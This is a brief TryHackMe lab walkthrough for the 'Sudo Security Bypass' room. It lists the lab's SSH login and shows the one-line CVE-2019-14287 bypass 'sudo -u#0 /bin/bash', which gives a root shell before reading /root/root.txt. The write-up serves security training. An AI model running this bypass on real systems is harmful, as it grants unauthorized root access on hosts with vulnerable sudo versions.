TryHackMe - Sudo Security Bypass

Let's ssh to the machine ssh -p 2222 tryhackme@10.10.114.224 password is tryhackme
sudo -l sends back to us the requirement to exploit CVE-2019-14287
Following the example shown we could try to use this trick sudo -u#0 <command> and put /bin/bash as the command and it works!

Questions

What command are you allowed to run with sudo? Answer /bin/bash
What is the flag in /root/root.txt? I will let you answer this on your own you will need to cat /root/root.txt

PreviousTryHackMe - SQL Injection Lab NextTryHackMe - Tomghost

Last updated 4 years ago